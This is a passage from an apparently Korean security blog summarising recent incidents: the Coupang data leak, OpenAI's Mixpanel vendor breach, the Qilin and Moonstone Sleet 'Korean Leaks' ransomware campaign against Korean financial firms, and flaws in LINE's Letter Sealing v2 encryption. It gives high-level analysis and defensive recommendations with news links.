- 이번 일을 계기로 제로트러스트 등 철저한 접근관리 강화가 다시금 강조될 것으로 보임
> 사고를 당한 기업에 대한 질타보다는 탈취 정보 무력화 등 해결에 초점을 맞추는 대응으로 전환해야 할 것
> 이용자 보호 측면에서, 단순한 사칭 경고를 넘어 피해 보상, 신용 보호, 재발 방지를 위한 제도 설계가 필요하다는 지적
> 이용자 정보를 수집·관리하는 기업에 대한 규제 체계, 감독 기구의 권한 및 역할 재정비가 시급하다는 여론
기타 - 이번 유출 규모는 지난 4월 발생한 SK텔레콤 유출 사태(약 2,700만명 유심 정보 유출)보다도 훨씬 큰 규모
> 사실상 국내 민간기업 기반 최대 개인정보 유출 사고로 기록될 것
> 정부는 플랫폼 기업의 개인정보 보호 체계 전반에 대한 실태 조사와 강화된 규제‧감독 방안을 검토할 것

- 권한 관리, 퇴사자 계정·키 회수, 접근 통제 등 기본 통제 체계가 제대로 작동하지 않으면 수백억 투자가 무의미
> 쿠팡의 보안 체계가 투자 규모와 인력 숫자보다 근본적인 원칙과 운영 체계가 무너졌음을 보여주는 대표 사례

- 기본적으로 지켜야 할 보안 원칙
퇴사자 계정·키 즉각 회수
민감한 시스템 접근 권한 최소화
관리자 계정 다중 인증
접근 로그 모니터링
API 키 주기적 교체
데이터베이스 접근권한 이원화
※ 기본 요소가 제대로 운영되지 않으면 아무리 거대한 보안 예산을 투입해도 취약점은 그대로 남음

 

보안뉴스

 

쿠팡, 고객 4500여명 개인정보 노출돼 정부 신고... “결제 관련 정보는 보호 돼”

쿠팡에서 고객 4500여명의 개인정보가 노출되는 사고가 발생했다. 이에 쿠팡은 과학기술정보통신부와 한국인터넷진흥원, 개인정보보호위원회에 신고했다.

www.boannews.com

 

쿠팡, 개인정보 노출 계정 3370만개로 활성고객 수 넘어... “쿠팡 사칭 연락 주의”

쿠팡이 고객 개인 정보 노출 계정이 3370만개 가량으로 확인됐다고 29일 밝혔다. 활성 고객 수를 넘는 수치로, 사실상 모든 고객인 것으로 보인다.

www.boannews.com

 

쿠팡 고객 3370만개 계정 정보 유출 사태, 민관합동조사단 꾸린다

국내 최대 이커머스 기업 쿠팡에서 노출된 고객 개인정보 계정이 3370만개에 달하는 것으로 드러난 가운데 정부는 이번 사안의 심각성을 고려해 민관합동조사단을 구성·운영한다.

www.boannews.com

 

[쿠팡 해킹] 내부자 소행에 무게... “인증·접근권한 관리 문제 가능성”

3370만명의 쿠팡 고객 개인정보가 유출된 사고는 내부자 소행에 무게가 실리고 있다. 이에 따라 인증이나 접근권한 관리쪽 문제였을 가능성이 제기된다.

www.boannews.com

 

[쿠팡 해킹] ‘피해보상’·‘환불’ 등 쿠팡 사칭 스미싱·보이스피싱 주의보

국내 이커머스 1위 쿠팡에서 대규모 개인정보 유출 사고가 발생함에따라, 이를 악용한 스미싱·보이스피싱 등 2차 피해가 우려돼 주의를 요한다.

www.boannews.com

 

[쿠팡 해킹] 정부 “3개월간 개인정보 불법 유통 집중 모니터링”

쿠팡 사고를 계기로 정부는 30일부터 3개월간을 ‘인터넷상(다크웹 포함) 개인정보 유노출 및 불법유통 모니터링 강화 기간’으로 지정해 집중 모니터링에 들어간다.

www.boannews.com

 

1년 보안예산 890억·보안인력 214명 쿠팡, 퇴사자 보안관리 구멍이 3,370만건 개인정보 유출로 이어

쿠팡에서 3천만명 넘는 대규모 개인정보가 유출된 가운데, 개인정보보호위원회와 과기정통부가 전면 조사에 착수했다. 쿠팡은 연간 900억 원 가까이 보안에 투자하고

www.dailysecu.com

 

KISA 보호나라&KrCERT/CC

KISA 보호나라&KrCERT/CC

www.boho.or.kr:443

요약 - 오픈AI의 데이터 분석 파트너 기업 믹스패널에서 보안사고가 발생하여 일부 API 사용자 계정 정보 유출
- 오픈AI는 이번 사건을 계기로 믹스패널 사용 영구 중단 및 보안 체계 재점검
내용 - 오픈AI의 데이터 분석 파트너 기업 믹스패널(Mixpanel) 보안 사고 발생
> 일부 이용자 정보가 유출됐으나, 대화 내용이나 비밀번호 같은 민감 정보는 포함되지 않음
> 믹스패널 내부 시스템에서 발생한 것으로 오픈AI 자체 시스템이나 인프라가 해킹되지는 않음
> 믹스패널은 9일 자사 시스템 침해 확인 및 조사를 거쳐 25일 피해 규모가 담긴 데이터셋을 오픈AI에 공유

- 오픈AI는 자체 조사를 거쳐 API 사용자 일부의 식별 정보가 포함된 분석 데이터가 공격자에 의해 ‘수출(export)’된 사실 확인
> 유출된 정보는 오픈AI API 플랫폼(platform.openai[.]com) 이용자의 정보
① 이름
② 이메일 주소
③ 대략적 위치정보(국가, 도시 등)
④ 접속 기기 운영체제 및 브라우저 정보
⑤ 서비스 접근 경로(Referer URL)
⑥ 조직 ID 또는 사용자 ID 등
※ API 사용자 계정과 연계된 ‘이름·이메일·메타데이터’를 확보했지만, AI 서비스 이용과 관련된 핵심 정보들은 외부로 노출되지 않음

- 오픈AI
> 27일(한국시각), 공식 블로그에서 “API 플랫폼의 웹 분석을 위해 사용하던 외부 협력사 믹스패널에서 보안 침해 사고가 발생했다”며 “이로 인해 일부 API 사용자 계정 정보가 유출된 정황을 확인했다”고 공지
> 챗GPT의 사용자 대화 로그(Chat logs)나 API 요청 내용, 비밀번호, API 인증키, 결제 정보, 신분증 등 민감 데이터는 이번 유출에 포함되지 않았다고 밝힘
> 사고 인지 직후 보안 조사의 일환으로 모든 서비스에서 믹스패널 연동을 즉시 중단하고 계약 해지 및 보안 체계 재점검 공지
> 영향받은 API 사용자들에게 순차적으로 개별 통지 이메일을 발송
> 회사나 관련 담당자를 사칭한 메일이 발송될 수 있어 의심스러운 메일이나 링크 클릭에 각별한 주의 요청

- API 플랫폼을 이용하는 개발자나 기업 계정의 메타데이터 일부가 노출된 상황
> 일반 이용자에 대한 영향은 미미할 것으로 보임

- 대규모 AI 사업자가 벤더 시스템 침해로 인해 사용자 데이터를 유출한 첫 사례
> AI 기반 서비스를 운영하는 국내 기업 역시 믹스패널, 구글 애널리틱스 등 다양한 외부 분석 플랫폼을 활용
> 국내 기업 또한 이번 사례를 계기로 외부 SaaS 벤더의 보안 체계, 데이터 수집 범위, API 관련 계정 보호 전략을 재점검 해야함

- AI 서비스가 확산될수록 외부 SaaS 벤더 체인은 복잡해지고, 벤더 중 하나만 무너지더라도 전체 생태계가 위험해지는 구조가 강화
> 공급업체 위험 평가(Vendor Risk Assessment)를 통해 보안성 검토지속적 모니터링 필요
> 서비스 공급자는 신뢰 센터(Trust Center) 같은 시스템을 통해 보안 인증 현황과 체크리스트를 공개하는 등 고객 신뢰를 담보할 투명성을 제공해야 함
> 벤더 계약 시 보안 평가·데이터 최소 수집·주기적 감사 같은 ‘벤더 보안 거버넌스’가 필수 요소가 될 것
기타 - 이름·이메일·접속 정보·조직 ID만으로도 공격자는 특정 기업의 개발자·엔지니어를 표적 삼아 API 키·액세스 토큰을 노리는 피싱, 조직명 기반의 스피어피싱, SaaS 계정 탈취 시도 등 다양한 공격 벡터를 만들 수 있음

- 글로벌 AI 플랫폼이 외부 분석 서비스에 의존한 데이터 흐름만으로도 사용자 정보가 노출될 수 있음을 보여준 사건
> AI 생태계 전반에서 ‘공급망 보안’이 핵심 과제로 떠오름

 

보안뉴스

 

또 터진 ‘공급망 보안’... 오픈AI, 협력사 해킹에 고객정보 노출 불똥

챗GPT 개발사 ‘오픈AI’(OpenAI)는 데이터 분석 파트너사인 ‘믹스패널’(Mixpanel)의 보안사고로 인해 일부 이용자의 정보가 유출됐다고 밝혔다. 다만, 대화 내용이나 비밀번호 같은 민감정보는 포

www.boannews.com

 

[이슈] 오픈AI, 분석 서비스 믹스패널 해킹으로 일부 API 사용자 정보 유출 인정…“자사 시스템

오픈AI(OpenAI)가 외부 분석 서비스 업체인 믹스패널(Mixpanel)의 보안 침해로 인해 일부 API 사용자 정보가 유출된 사실을 26일(현지시간) 공식

www.dailysecu.com

 

1. 개요

- Bitdefender, 한국 금융 서비스 업계를 주요 타깃으로 한 대규모 위협 “Korean Leaks 캠페인” 발표 [1]
- RaaS(Ransomware-as-a-Service) 그룹 Qilin과 북한 연계 APT 그룹 Moonstone Sleet이 협업
MSP(Managed Service Provider, 관리 서비스 제공업체)를 초기 침입 경로로 활용해 33개의 기업이 피해(피해 업체 중 대부분이 금융서비스 업체)
- 이번 사건을 계기로 MSP를 ‘신뢰된 내부자’로 간주하는 관행을 재검토해야 한다고 강조

2. 주요내용

2.1 한국 내 비정상적인 랜섬웨어 급증

- 24.09 ~ 25.08 랜섬웨어 피해자 수는 월 평균 약 2건 수준이었으나, 25.09 피해자 건수는 25건으로 급증

> 초기 분석 결과, 25.09에 확인된 피해는 모두 Qilin 랜섬웨어에 의한 것으로 확인

※ 1건의 건설 회사를 제외한 24건 모두 금융서비스(특히 자산운용사)

[사진 1] 24.09 ~ 25.09 랜섬웨어 피해자 추이

2.2 Qilin & Moonstone Sleet

Qilin 랜섬웨어 그룹은 최근 몇 달 동안 RaaS 통계에서 최상위권을 유지해온 조직
> 다크웹 전용 유출 사이트(DLS, Dedicated Leak Site)에 데이터 공개 및 데이터 몸값을 요구
> 주요 운영팀은 브랜드, 랜섬웨어 빌드, 인프라, 협상용 텍스트를 제공하고, 실제 침투·내부 장악·배포는 다른 조직이 수행하는 “긱 이코노미형 RaaS” 형태로 운영
> 수익의 80~85%는 실제 공격조직이 가져가고, 운영팀은 15~20%만 가져가는 구조

※ CIS(독립국가연합) 국가를 공격하지 않는 규칙, 러시아어 포럼 활동, 운영진 일부가 러시아어와 영어를 사용하는 등 러시아에 기반한 랜섬웨어 그룹으로 보임

 

- Qilin은 2025년 초 북한 연계 APT 그룹 Moonstone Sleet과 협업을 시작
> Moonstone Sleet는 MS가 2024년 규명한 북한 위협 그룹 [3]
> 국가 연계 APT 그룹과 범죄 RaaS의 협업이라는 새로운 위협 양상을 시사

 

2.3 Korean Leaks 캠페인

- Korean Leaks 캠페인은 총 세 차례에 걸쳐 진행되었으며, 유출된 정보의 대부분은 25.09 공개
> 총 33곳의 피해자 중 28곳은 현재 공개 상태이며, 거의 대부분 한국 금융사, 특히 자산운용사를 공격 대상으로 삼음
> DLS에 유출된 데이터는 최소 100만 개 이상의 파일과 약 2TB에 달하며, 피해자의 메타데이터가 누락된 점을 고려하면 피해 규모는 훨씬 클 가능성 존재

[사진 2] 25.08~25.09 경 Qilin 랜섬웨어 조직이 공격에 성공한 기업 리스트

2.3.1 1차 유출

- 25.09.14 10개 금융관리·자산운용사 공개
> 한국 기업들의 방대한 데이터에 접근을 확보했다는 식으로 대규모 추가 유출 예고

[사진 3] 1차 유출

2.3.2 2차 유출

- 25.09.17 ~ 25.09.19 추가 피해자 9곳 공개
> 한국 금융시장과 투자자 전반을 겁주는 전략규제 당국에 조사 요구

[사진 4] 2차 유출

2.3.3 3차 유출

- 25.09.28 ~ 25.10.04 마지막 9곳 공개
> 2차 유출의 공격적인 요구에서 개별 피해 기업을 향한 전통적인 금전 갈취 문구로 전환

[사진 5] 3차 유출

2.3.4 기타

- 25.10.22 DLS에 금융·자산운용사 프로필을 가진 새로운 피해자 1TB 이상의 데이터 공개
> ‘Korean Leaks’라는 이름은 더 이상 사용되지 않았고 게시물도 하루 만에 삭제

 

2.4 Root Cause

- 캠페인은 기업들이 개별적으로 노려진 것이 아닌 하나의 공통 약점을 통해 피해가 발생

가설 설명
가설 1
상위 MSP 또는
IT 서비스·SW 벤더 침해
단일 IT서비스 제공자·금융 소프트웨어 벤더·회계법인 등의 서버/관리 시스템 침해
> 해당 업체가 관리하는 다수의 고객으로 확장 가능한 접근 권한을 부여하는 등 악용할 수 있음
> 자산운용사 및 기타 금융기관의 서버와 컴퓨터 시스템을 관리하는 국내 IT 서비스 제공업체를 해킹해 국내 20여 개 자산운용사가 랜섬웨어 피해를 당하는 사례 존재 [4]
※ 가장 유력한 가설
가설 2
공통으로 사용하는
금융 SW/장비 제로데이 취약점 악용
특정 금융 소프트웨어/하드웨어의 0-day 또는 공통 취약점 악용
> 동일 제품을 쓰는 다수 기관을 한 번에 침투
가설 3
유출된 자격증명 또는
내부자 거래 시나리오
내부자 매수 또는 다량의 유효한 자격증명을 암시장에서 구매/입수하여 침투
> 유효한 로그인으로 보안통제를 우회할 수 있어 성공률이 높음

 

2.5 결론 및 권고 사항

- 해당 캠페인을 촉발한 MSP 침해는 사이버 보안 논의에서 거의 다뤄지지 않음
> 주로 SW공급망과 트로이화된 업데이트에 초점을 맞추는 경향이 있으나 이는 아직 통계적으로 드문 형태
> 여러 기업 접근 권한을 가진 벤더·계약업체·MSP를 직접 해킹하는 방식이 훨씬 흔하고 실용적인 전략

> 하나의 통제 수단이 실패하여도 후속 통제 수단이 피해를 감지·차단·제한할 수 있도록 다층적인 방어 체계 구축이 필요

구분 설명
MFA(Multi-Factor Authentication, 다중인증) 적용 모든 계정, 특히 원격 접속·VPN·특권계정에 대해 강제 적용
> 자격 증명이 유출돼도 즉각적인 네트워크 액세스를 방지할 수 있음
최소 권한의 원칙(Principle of Least Privilege, PoLP) 모든 시스템에 엄격한 역할 기반 접근 제어(Role-Based Access Control, RBAC) 구현
> 벤더사·파트너 계정이 업무에 필요한 최소한의 세션·권한 부여
네트워크 분할 네트워크 내 중요한 시스템과 민감 데이터 격리
> 벤더 네트워크나 비필수 서비스와 같은 네트워크에서 내부 핵심 시스템으로 접근하지 못하도록 네트워크 분할 및 격리
EDR/XDR/MDR 도입 공격자가의 체류 시간을 최소화할 수 있도록 엔드포인트 가시성 확보
> EDR/XDR을 통해 엔드포인트의 가시성 확보 및 상관 관계 분석 또는 MDR 아웃소싱
랜섬웨어 플레이북 깨기 공격자가 잘 확립되고 반복적인 공격 플레이북에 의존하기에, 예측 가능한 공격 경로를 끊어야 함
> PHASR(Proactive Hardening and Attack Surface Reduction, 공격 표면 감소·동적 하드닝) 같은 기술 도입
현재 보안 통제 운영 대부분의 조직에서 기술의 부족이 아닌 기존 컨트롤의 잘못된 구성과 활용도가 낮다는 것이 문제
> 랜섬웨어 완화 등 중요한 방어 기능의 활성화 여부 및 보유한 보안 기능을 활성화 상태로 만드는 것이 중요
공급망 리스크 관리 강화 MSP·벤더에 대한 요구사항·계약·감사·접속 통제 강화 및 제3자 접근 권한 정기적 검토

3. 참고

[1] https://www.bitdefender.com/en-us/blog/businessinsights/korean-leaks-campaign-targets-south-korean-financial-services-qilin-ransomware
[2] https://www.dailysecu.com/news/articleView.html?idxno=202815
[3] https://thehackernews.com/2024/05/microsoft-uncovers-moonstone-sleet-new.html
[4] https://koreajoongangdaily.joins.com/news/2025-09-23/business/finance/More-than-20-management-companies-may-have-suffered-data-breaches-after-a-ransomware-attack/2406352

'랜섬웨어 > 분석' 카테고리의 다른 글

LockBit 랜섬웨어 동향  (0) 2023.06.16
다크파워 (Dark Power) 랜섬웨어  (1) 2023.03.28
ESXiArgs Ransomware  (0) 2023.02.15
Masscan 랜섬웨어  (0) 2022.10.12
LockBit 3.0 랜섬웨어 빌더 분석  (1) 2022.10.04
요약 - 메시징 플팻폼 LINE의 암호화 프토콜 Letter Sealing v2에서 치명적 취약점 발견
- 메시지 재생 공격, 평문 데이터 유출, 사칭 공격 등 세 가지 위험 확인
내용 - 덴마크 연구진, LINE의 맞춤형 종단 간 암호화(End-to-End Encryption, E2EE) 프로토콜인 Letter Sealing v2에서 치명적인 취약점 발견
메시지 재생 공격, 평문 데이터 유출, 사칭 공격 등 세 가지 주요 침해 위험에 사용자들이 노출
> iOS용 라인 앱을 대상으로 중간자 공격 실험에 성공해 모든 취약점이 실제 환경에서 악용 가능함을 입증
> 사용자가 악성 라인 서버에 연결될 때 가능하며, 사용자는 자신이 합법적인 서버를 사용하고 있는지, 서버가 프로토콜을 제대로 준수하는지 확인할 방법이 없음
> 맞춤형 프로토콜을 사용한 것이 근본적인 문제이며, 이는 암호학 분야의 표준을 따르지 않아 오래된 문제점을 반복하고 있다고 지적

① 프로토콜의 Stateless 설계로 인해 악성 서버가 암호화된 기존 메시지를 미래의 어느 시점이든 반복적으로 재전송할 수 있음
> 메시지의 맥락과 의미를 완전히 바꾸어 혼란을 야기할 수 있음
> 암호문을 보낸다는 점에서 사용자는 절대 이를 눈치챌 수 없음

② 스티커 추천 기능 및 URL 미리보기 기능에서 사용자 입력 내용이 평문 형태로 서버에 전송
> 사용자의 기기에 없는 스티커를 추천하기 위해, 사용자가 입력한 실제 텍스트 일부가 라인 서버로 보내짐
> 사용자가 링크를 전송하면 상대방에게 미리보기 카드가 표시되는데, 이 과정에서 전체 URL이 서버로 전송
> URL에는 회의실 링크, 비밀번호, 토큰, 비공개 파일 주소 등 각종 민감한 정보가 포함될 수 있는데, 모두 서버가 그대로 확인할 수 있는 구조

③ 그룹 채팅 참여자가 서로를 가장해 메시지를 위조할 수 있음
> 가장 치명적인 문제
> 채팅에 참여한 사용자라면 누구나 다른 참가자를 사칭해 메시지를 위조할 수 있어, 수신자는 메시지가 조작된 내용임을 알 수 없음
> 라인이 제공하는 메시지 무결성과 발신자 인증 기능이 근본적으로 취약하다는 의미

- 연구진은 라인에 취약점을 사전 공개
> 라인은 취약점을 인정하며, 프로토콜 특성상 쉽게 수정할 수 없다는 입장
> 일부 기능을 비활성화하면 위험을 줄일 수 있으나, 근본적 해결책이나 프로토콜 교체 계획은 제시하지 않음

- 단순 메시지 노출 문제가 아니라, 실제 업무·정치·사회 전반에 치명적인 영향을 줄 수 있다고 경고
> 편의성과 기능 확장을 위해 도입된 요소들이 오히려 보안성을 약화 시킴
> 프로토콜 설계 자체도 현대적 E2EE 기준에 미치지 못하고 있다는 점이 확인

- 12월 개최되는 Black Hat Europe에서 발표될 예정
기타 -

 

보안뉴스

 

메시징 앱 ‘라인’, 아시아 사용자들 사이버 첩보 노출 치명적 취약점 발견돼

일본, 대만, 태국, 인도네시아 등 동아시아의 수백만 명이 사용하는 메시징 플랫폼 라인(LINE)의 맞춤형 종단 간 암호화(E2EE) 프로토콜인 레터 실링 v2에서 치명적인 취약점들이 발견됐다.

www.boannews.com

 

한국 비롯 아시아 2억 명 쓰는 메신저 ‘라인(LINE)’ 암호화에 심각한 취약점…“메시지 위조·재

한국, 일본 및 동아시아에서 일상 필수 앱으로 자리 잡은 메신저 ’라인(LINE)‘의 엔드투엔드 암호화(E2EE) 기능에 심각한 보안 취약점이 존재하는 것으로 드

www.dailysecu.com

 

+ Recent posts